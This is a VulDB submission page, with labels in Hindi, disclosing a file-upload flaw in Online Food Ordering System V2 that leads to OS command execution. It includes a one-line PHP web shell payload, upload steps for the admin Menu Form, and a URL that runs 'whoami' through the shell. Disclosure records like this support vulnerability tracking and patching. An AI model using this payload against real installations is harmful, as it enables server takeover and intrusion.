| शीर्षक | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| विवरण | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A File Upload Vulnerability which has been escalated to OS Command Injection in Online Food Ordering System V2 while uploading a .php file in "Menu Form" page.
`
Payload used:-
<?php system($_GET['c']); ?>
`
Parameter":-
Menu Form > Image: <?php system($_GET['c']); ?>
`
Steps to reproduce:-
1. Here we go to : http://localhost/fos/admin/index.php?page=menu
2. Now in those Parameters "Image" here we upload a php file
3. In that we put our payload "<?php system($_GET['c']); ?>" and we name it as 1.php and upload it
4. As we open in another tab we need to put our endpoint "?c=" and we can see our OS Command Injection Attack
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| उपयोगकर्ता | DisguisedRoot (UID 33702) |
|---|
| सबमिशन | 12/01/2023 07:58 PM (3 साल पहले) |
|---|
| संयम | 12/01/2023 10:09 PM (2 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image अधिकार वृद्धि] |
|---|
| अंक | 17 |
|---|